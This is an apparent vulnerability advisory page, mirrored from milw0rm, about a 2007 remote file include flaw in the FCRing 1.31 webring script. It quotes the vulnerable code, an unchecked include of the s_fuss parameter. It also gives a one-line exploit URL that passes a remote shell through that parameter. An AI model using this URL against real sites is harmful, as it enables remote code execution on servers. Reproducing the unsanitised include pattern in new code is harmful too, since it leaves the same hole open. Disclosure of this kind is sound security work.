Lucene search

K

SecurityvulnsSECURITYVULNS:DOC:16183

HistoryFeb 25, 2007 - 12:00 a.m.

FCRing <= 1.31 (fcring.php s_fuss) Remote File Include Vulnerability

2007-02-2500:00:00

vulners.com

15

FCRing 1.3 Webringskript

Found by kezzap66345 *

Script:
http://www.scripter.ch/start.php?id=41.18.9&pos=fcring&title=FCRing%201.3

ERROR:

if($s_fuss != "")
include($s_fuss); <<< rfi coded

RFI:

http://SITE.com/path/fcring.php?s_fuss=[SHELL]

kezzap66345[at]hotmail[dot]com

thanx=x0r0nstr0keshika****************************************************

milw0rm.com [2007-02-23]